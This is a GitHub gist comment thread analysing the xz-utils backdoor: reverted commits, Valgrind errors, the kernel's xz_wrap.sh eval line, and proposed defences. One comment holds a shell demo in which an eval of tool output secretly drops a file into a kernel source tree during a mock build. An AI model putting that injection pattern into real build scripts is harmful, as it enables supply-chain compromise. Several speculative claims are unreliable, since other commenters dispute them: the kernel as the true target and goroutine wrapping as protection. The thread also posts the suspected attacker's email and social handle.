🤔

Any particular reason, Jia Tan, why you nuked this whole area, when in its place now sits the execution path that takes you to the backdoor?

image

image

@rybak
Copy link

rybak commented Apr 10, 2024

FYI, the malicious commits (the in-repository portion of the backdoor) were reverted: e93e13c (Remove the backdoor found in 5.6.0 and 5.6.1 (CVE-2024-3094)., 2024-04-08).

@thesamesam
Copy link
Author

I'll try to respond to the above comments which need me to make changes later today. Thanks.

@roccotanica1234
Copy link

Jia Tan's Twitter account, associated with jiat0218@gmail.com, is: https://twitter.com/JiaT03868010 (I haven't found it mentioned anywhere)

@flybyray
Copy link

What is "this"? xz_wrap was recently changed by Lasse, but the changes are reasonable and do not introduce any new eval; the options are consistent with the manpage recommendations. The Makefiles were recently changed for version bumps and other reasons, not much to do with xz.

cmd_xzkern = cat $(real-prereqs) | sh $(srctree)/scripts/xz_wrap.sh > $@

ref: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/Makefile.lib?h=next-20240328#n528

which is quite different from all the other compression tools, because it does not pipe directly into the xz tool: it uses an additional sh process in the hierarchy, and sh provides additional insight via environment variables for child processes.
The whole thing has nothing to do with the stripped-down xz decompression code within the kernel.
The call goes to whatever is packaged in the kernel build environment as $XZ.

eval "$($XZ --robot --version)" || exit

ref: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/xz_wrap.sh?h=next-20240328#n36
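The reason that eval line draws attention is generic: eval executes whatever the command prints, so whoever controls the $XZ binary controls shell code running in the build. A toy sketch with invented fake_xz_* functions standing in for the tool (the version-string format is illustrative only):

```shell
# A cooperative tool prints variable assignments intended for eval:
fake_xz_good() { printf 'XZ_VERSION=50060012\n'; }
# A compromised tool can print arbitrary shell; eval runs it just the same:
fake_xz_evil() { printf 'XZ_VERSION=50060012; marker="arbitrary code ran"\n'; }

eval "$(fake_xz_good)"
echo "version: $XZ_VERSION"

eval "$(fake_xz_evil)"   # same call site, but now a side effect fires too
echo "$marker"
```

Nothing here implies the real $XZ misbehaved; it only illustrates why an eval-of-tool-output pattern widens the trust boundary of a build.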

When you follow @christoofar's lookups you may notice that $XZ might work differently when it detects specific things.
$XZ is certainly linked against liblzma.so.

@Artoria2e5
Copy link

And my dear Ray, there’s already a NON-MALICIOUS EXPLANATION as to why an sh is used: it turns on the bcj flags.

@flybyray
Copy link

And my dear Ray, there’s already a NON-MALICIOUS EXPLANATION as to why an sh is used: it turns on the bcj flags.

Better safe than sorry. Ask yourself what a NON-*-EXPLANATION is worth, especially an explanation that is outright wrong; it just shows that the supplier has no experience.

@Artoria2e5
Copy link

Artoria2e5 commented Apr 12, 2024

sh provides additional insight via environment variables for child processes.

It also does not, because the shell script in question does not export anything new to the environment. The shell only changes envp in three circumstances:

  • when a new variable is explicitly added to envp via "export" or "declare -x"
  • when a variable is explicitly de-exported, say by running declare +x
  • when an already-exported variable, such as PATH, is changed or unset

Otherwise every variable change stays local to the shell process.
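Those three cases are easy to verify directly: a child process (env here) sees only what was actually exported. A minimal sketch:

```shell
LOCAL_ONLY=secret       # assigned but never exported: stays local to this shell
export SHARED=visible   # explicitly exported: copied into every child's envp

# Ask a child process what it can actually see:
env | grep '^SHARED='                                   # present in the child
env | grep '^LOCAL_ONLY=' || echo 'LOCAL_ONLY unseen'   # absent from the child
```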

The only additional "insight" is just the well-documented BCJ and lzma alignment parameters.

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

@paulfloyd
Copy link

paulfloyd commented Apr 12, 2024

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

@flybyray
Copy link

flybyray commented Apr 12, 2024

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

Polite as you are, you used "maybe". Politeness won't help you against a criminal hacker's ideas. The experiences of doubters are often worth more than those of so-called fact-checkers.

because the shell script in question does not export anything new to the environment

If you waited patiently after reading carefully, until you really understood what you had read without ignoring the meaning of the words, you could avoid misinterpretations and make fewer inference errors.
I wrote "insight via environment variables for CHILD processes". How dare you then talk about "does not export anything new to the environment"? I wish you would rather fantasize about the similarity between eval and evil.

Have you really understood even some of the attack patterns that have already been discussed here? Of course the attackers in a build process don't care about changing the environment! Just think about how many places environment variables could appear in logs; the hide-and-seek game would end immediately. I would recommend that you inspect some public build servers, their artifacts, and the detailed outputs of their builds.

The trick is to leave artifacts in the right places as inconspicuously as possible during the build process.

But I'm not giving up on you yet. Let's start by making the bold printed a little clearer.
The following uses only the fragments highlighted in the leading comment as a sample. I didn't develop xz, so I'm replacing it with sh. I can't use the --robot --version arguments, but they are almost irrelevant.

# this is only pretext normally provided by the task to build the kernel
TEMPDIR="$(mktemp -du)"
mkdir -p $TEMPDIR/Artoria2e5/mykernel/scripts
mkdir -p $TEMPDIR/Artoria2e5/mykernel/prereqs
srctree=$TEMPDIR/Artoria2e5/mykernel
pre_reqs="$TEMPDIR/Artoria2e5/mykernel/prereqs/a.txt"
XZ=sh
export XZ
echo please cleanup $TEMPDIR when you are done
cat >"$TEMPDIR/Artoria2e5/mykernel/prereqs/a.txt"<<'EOF'
lorem ipsum and some interesting pointers to CANCER
EOF
cat >"$TEMPDIR/Artoria2e5/mykernel/scripts/xz_wrap.sh"<<'EOF'
eval "$($XZ -c 'TARGET_DIR='$(dirname ${BASH_SOURCE[0]})/..';echo STEVE_S_LATE_REVENGE_FOR_LINUX="$(grep -Po '\''pointers to \K\S+'\'')";echo $'\''X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\''> ${TARGET_DIR}/blob.txt')" || exit
#this is just to make it easier to understand the above XZ command would be able to produce this too
echo a $STEVE_S_LATE_REVENGE_FOR_LINUX that attaches itself in an intellectual property sense to everything it touches
EOF

# now we are going to "build the kernel" - showcasing just the relevant, maybe-malicious part
# original 'cmd_xzkern = cat $(real-prereqs) | sh $(srctree)/scripts/xz_wrap.sh > $@' 
cat ${pre_reqs} | sh ${srctree}/scripts/xz_wrap.sh > a_message_to_the_linux_people.txt
# finished nothing special to see

# verify that the build context was modified
cat a_message_to_the_linux_people.txt
find $TEMPDIR -type f -name blob.txt -exec cat {} \;

# cleanup
rm -rvf $TEMPDIR

Unfortunately, based on your reading comprehension, I have to assume that you still won't understand; but maybe there are a few others who can help you further.
The verify step would show you:

  • 'cat a_message_to_the_linux_people.txt'
a CANCER that attaches itself in an intellectual property sense to everything it touches
  • 'find $TEMPDIR -type f -name blob.txt -exec cat {} \;' # a nice blob placed into srctree
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

i have done my duty and shown good will

@dnorthup-ums
Copy link

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

@paulfloyd The 0x6 address is pretty easy: that's evidence of something being compiled with the -fPIE compile-time flag, something the build scripts of xz-utils do not do (including the compromised ones). As for the 64-bit 0x77... or 0xDD2A.... addresses, it looks to me like something is trying to be clever and take advantage of the "hole" between typical user space and kernel space when injecting the payload via ifunc. I suspect that if you look at one of the disassembly attempts on the exploit you'll get more insight into what is going on there and why those addresses matter (as noted, I strongly suspect they do).

@AdrianBunk
Copy link

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

Polite as you are, you used " maybe". Politeness won't help you against a criminal hacker's ideas. The experiences of doubters are often worth more than those of so-called fact-checkers.

if you waited patiently after reading carefully until you really understood what you had read, without ignoring the meaning of the words, you could avoid misinterpretations and make fewer inference errors.

@flybyray Conspiracy theories and insults from people like you are not helpful.

A huge amount of people all over the world who are highly competent in this area have been working on dissecting this exploit for 2 weeks, anyone who claims to have found something new on the technical side here in this discussion only demonstrates being clueless.

Please stop it.

@AdrianBunk
Copy link

AdrianBunk commented Apr 12, 2024

The 0x6 address is pretty easy, that's evidence of something being compiled with the -fPIE compile time flag set, something the build scripts of xz-utils do not do (including the compromised ones).

All major distributions (including Debian) changed their compiler to default to PIE several years ago for ASLR.

@christoofar
Copy link

christoofar commented Apr 13, 2024

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

When we talked it out, the function doing this nuke (microlzma is what Jia Tan wants to raise during init) did not supply a size when it entered the loop that starts writing 0x00 into a stack area.

This function, lzma_stream_header_encodb, is not in the 5.6.1 .o release; it only appears in 5.6.0. Hence the theory that a mistake in the feature flags for the build failed to completely strip out the setup for a debug/examine tool (which would have reported the progress of the locator, and possibly also brought in a more comprehensive debug/examine tool as an option). My guess is that it's not a mistake in the offset calculations (there is a whole disassembly library inside the malware), but a way to quickly patch the obfuscations in while still making sure the hotloading core code stays functional.

Jia Tan needed some way to know that he had landed on all the jump calls needed to patch libcrypto.

Further: the final 5.6.1 has an insert in the ELF table for a note area that moves all the bytes down by 0x26, and throwing the asm dumps into diff shows a heavy amount of offset changes in microlzma, the gateway to the backdoor.

@christoofar
Copy link

christoofar commented Apr 13, 2024

I've been thinking a lot about this as a CGo/gccgo dev: "What can an HLL programmer do against the likes of Jia Tan? They're attacking from the foundation software."

I'm not settled on this one, but wrapping calls to C libs in goroutines would probably raise the difficulty level, given the rapid context switches and the unpredictability the Go runtime introduces in where the jump calls end up.

After 129,000 lines of asm, here is printf("Hello World") in Go down at the bottom:
image

Now, let's see what happens when we do this:

package main

import "time"

func main() {
	hello := "Hello world!"
	go func() {
		print(hello)
	}()
	time.Sleep(1 * time.Second)
}

Now we're asking the Go runtime to activate concurrency, and main itself gets split into two compact parts, with an anonymous function that disappears into the goroutine ecosphere (to get this to fit, I'm stripping symbols):
image
image

Notice how nice and compact the goroutine is! There's not much you can do here except try to intercept the ret and call instructions, but then you also need to make sure the runtime's stack cleanup happens, or things start to go crashy-crashy.

So now let's make a C lib call but push it down into a goroutine wrapper, while keeping it synchronous. For fun, the data for the function will be passed via a channel, which pulls in the communication/sync areas of the runtime with its maze of runtime functions. And since we're here, let's make it a full Go wrapper, with two channels, a goroutine bridge, and a done signaler.

package main

// #include <stdio.h>
// #include <stdlib.h>
// void printFromC(const char* str) {
//     printf("Received C string: %s\n", str);
// }
import "C"
import "unsafe"

func main() {
	myPrint("Hello from Go!")
}

func myPrint(hellostring string) {
	// Protect the C library call from Jia Tan and the NSA
	sendchan := make(chan string)
	recvchan := make(chan string)
	done := make(chan bool)
	
	go func(sender chan string, receiver chan string){ // This chan is send-only
		go func(receive <-chan string) { // This one is recv-only
			callCPrint(receive)
			done <- true
		}(receiver)
		go func() {
			strToSend := <- sender
			receiver <- strToSend
			close(sender)
			return
		}()
	}(sendchan, recvchan)

	sendchan <- hellostring
	<-done
	return
}

func callCPrint(str <-chan string) {
	cStr := C.CString(<-str)
	defer C.free(unsafe.Pointer(cStr)) // Deallocate memory when done
	C.printFromC(cStr)
}

The main() in asm representation gets shorter
image

But now there is some real fun going on in myPrint(), which acts as a traffic cop moving the string along its way into the chaos of pthread, with its context switches and semaphores. myPrint is split by the compiler into 6 asm functions (one each for the launch point and the anonymous function of the three goroutines) to allow their dynamic relocation by the runtime.

image
That goes on for pages.

callCPrint then has a thunk going on, and it can't get its data back to myPrint without going back through the runtime maze.
image

I'm still not sold on this approach, but I'm definitely willing to change my own behavior to make these creeps go away if it raises the difficulty high enough. And throwing CGo calls through a goroutine bridge still reads as clear code to me.

@tdkuehnel
Copy link

Beside the technical side of this incident, which required profound knowledge and ability to develop and implement such an attack, the weak point, and what was easy to exploit, was the social factor: it took only two people working together to nudge the project maintainer out of the way. THAT is the real catastrophe.

We need to use the internet to represent our real social connections, not to throw the whole world into one community driven by some huge content aggregators. The real power of the internet is still hidden in its decentralized inherent structure, which we are using and taking benefit of only in small amounts today.

Yes, client-server brought the whole internet thing to life, but we are now adult enough to decide for ourselves whom to share and connect with directly, and who has access to which parts of our own data. My comments are my data; every piece of content I create is my data. It should be distributed by the network of the people I know and trust, by their devices, not by content aggregators. When I watch a YT video or other content, I want to see the comments of my friends and social contacts first, accessed directly from their data stores. Better yet, let me decide and configure which comments to see at all; don't let that be dictated by some content aggregators that are dead-stuck in their own development. The whole internet has to be shaped around our social contacts and networks, not dictated by content aggregators. /rant off.

@cwegener
Copy link

cwegener commented Apr 14, 2024 via email

@avbentem
Copy link

@cwegener I'm guessing @tdkuehnel may be referring to what happened in 2022 according to a list of events curated by @boehs.

@flybyray
Copy link

flybyray commented Apr 14, 2024

@flybyray Conspiracy theories and insults from people like you are not helpful.

Perhaps you are in a position to take your sort of interference as an insult.

A huge amount of people all over the world who are highly competent in this area have been working on dissecting this exploit for 2 weeks, anyone who claims to have found something new on the technical side here in this discussion only demonstrates being clueless.

Are you implying that I am trying to claim something without proof? And you try to do that with nothing but a personal assertion? Pipes!

Please stop it.

I hope you do that and come back next time with meaningful additions and statements.
I also hope that you understand what an honest discussion is: that you have to push back when others play unfair by ignoring essential context or trying to distort the meaning of statements.

To get back on track:

  • I joined this discussion by pointing out that the ultimate target for a supply-chain attack would be the kernel. I was just missing something here.
  • There were surprising changes in the linux-next repo shortly before the backdoor became known (2024-03-20).
  • There were discussions on the kernel mailing list about removing this change, but it had already been pushed into linux-next.
    • There is now a newer comment, https://lwn.net/ml/linux-kernel/20240404170103.1bc382b3@kaneli/, and I am happy that my concern is addressed there. But I would be happier if they handled all compression tools equally; there should be a strict interface to comply with. I am not sure why only xz should be allowed to run in a different form - it just shows that its internal workings are too complex.

Exactly what this recent conclusion section states:
"...
It’s evident that this backdoor is highly complex and employs sophisticated methods to evade detection. These include the multi-stage implantation in the XZ repository, as well as the complex code contained within the binary itself.

There is still much more to explore about the backdoor’s internals, which is why we have decided to present this as Part I of the XZ backdoor series. ..."

"the binary itself" cannot be ignored as the master plan (the "golden piece") for a targeted supply-chain kernel attack.
The discussions mentioned above especially put important things (a tangible error) on the table.
There may be other tools that are part of the build process and are assumed to be safe without question. Someone with this concern is even trying to scan complete package trees: https://github.com/hlein/distro-backdoor-scanner

I fear the structure of a suitable defense will look more complex.

Hopefully automation and statistics can help spot risks,
e.g. you need to track maintainers and their commitment to projects. This is just an example:
"""
Many open-source software (OSS) projects are self-organized and do not maintain official lists with information on developer
roles. So, knowing which developers take core and maintainer roles is, despite being relevant, often tacit knowledge. We propose
a method to automatically identify core developers based on role permissions of privileged events triggered in GitHub issues
and pull requests. In an empirical study on 25 GitHub projects, (1) we validate the set of automatically identified core developers
with a sample of project-reported developer lists, and (2) we use our set of identified core developers to assess the accuracy of
state-of-the-art unsupervised developer classification methods. Our results indicate that the set of core developers, which
we extracted from privileged issue events, is sound and the accuracy of state-of-the-art unsupervised classification methods
depends mainly on the data source (commit data vs. issue data) rather than the network-construction method (directed vs.
undirected, etc.). In perspective, our results shall guide research and practice to choose appropriate unsupervised classification
methods, and our method can help create reliable ground-truth data for training supervised classification methods.
"""
ref: https://www.se.cs.uni-saarland.de/publications/docs/BAJ+23.pdf

@calestyo
Copy link

calestyo commented Apr 14, 2024

I'm not the admin here (so obviously @thesamesam decides what this is about, not me), but my impression so far was that this gist primarily gives an overview/index/references for the XZ backdoor - not actual in-depth discussion of the various fields related to it (reverse engineering, OSINT, etc. pp.).

That was the nice thing about it: getting only the really new/concrete stuff from it.

There do seem to be numerous places dedicated to in-depth discussion (and arguing ;-) ), like https://discord.gg/TPz7gBEE (for both reverse engineering and OSINT).

@AdrianBunk
Copy link

I joined this discussion by pointing out that the ultimate target for a supply-chain attack would be the kernel.

That's nonsense.

Nothing you provided indicates that anything malicious was actually submitted to the kernel, and it would have been unbelievably stupid for the attacker to try to add more exploits, since this would increase the risk of the openssh backdoor being detected.

The openssh backdoor would have given the attacker remote administrator access to most Linux servers on the internet.
This is already the ultimate backdoor.

And here is not the right place for people to present whatever thoughts or theories they come up with, please do that in a more appropriate location.

@the-lne
Copy link

the-lne commented Apr 15, 2024 via email

@thesamesam
Copy link
Author

It makes my life a lot easier if the comment section here is kept for editorial changes I need to make, extra sources, etc.

Please keep theorising to other forums. Thanks!

@felipec
Copy link

felipec commented Apr 15, 2024

@thesamesam this is a good resource I think: https://github.com/felipec/xz-min.

@thesamesam
Copy link
Author

Thanks @felipec! I have a few other things to go over in the backlog and can hopefully include them all in a batch later today or tomorrow.

@dnorthup-ums
Copy link

@thesamesam
Sam, et al:
I think there's another "Easter egg" in there... Looking closely again at Lasse's f9cf4c05 commit (in the tukaani repo) and his 02e35059 commit, and then re-reading the build-tool scripts, it looks like "Jia" intended to be able to use TCP connections from inside xz on platforms built with CMake. There's got to be some way to invoke that; perhaps he hadn't finished implementing that part yet. I think somebody with better fuzzing skills than mine should give it a close look. The good news is that Lasse re-enabled the Landlock function for CMake builds..., presuming that "Jia" hadn't hidden something in the Landlock code.

Since there's apparently zero interest, here or elsewhere, in following up on "Jia"'s fairly obvious attempt to weaponize the CMake builds, I'm outta here. I'm not hard to find should anybody fail to make sense of what I said earlier, but I'm not bothering to follow the conversation here anymore.

@thesamesam
Copy link
Author

OK, I've gone through the comments; please let me know if I missed any changes, either from here in the last few days or generally from around the internet. Thanks!

@roccotanica1234
Copy link

Jia Tan's Twitter account, associated with jiat0218@gmail.com, is: https://twitter.com/JiaT03868010 (I haven't found it mentioned anywhere)

I just noticed that Jia Tan's Twitter registration date (Dec 2020) is earlier than his GitHub registration date (26 Jan 2021).

image

@pillowtrucker
Copy link

did we gett'em yet

@calestyo
Copy link

@thesamesam
Copy link
Author

@calestyo Thanks!

@michaelblyons
Copy link

michaelblyons commented May 1, 2024

You may be interested in @blasty's SSH agent.

Oops. I see it on the list now.
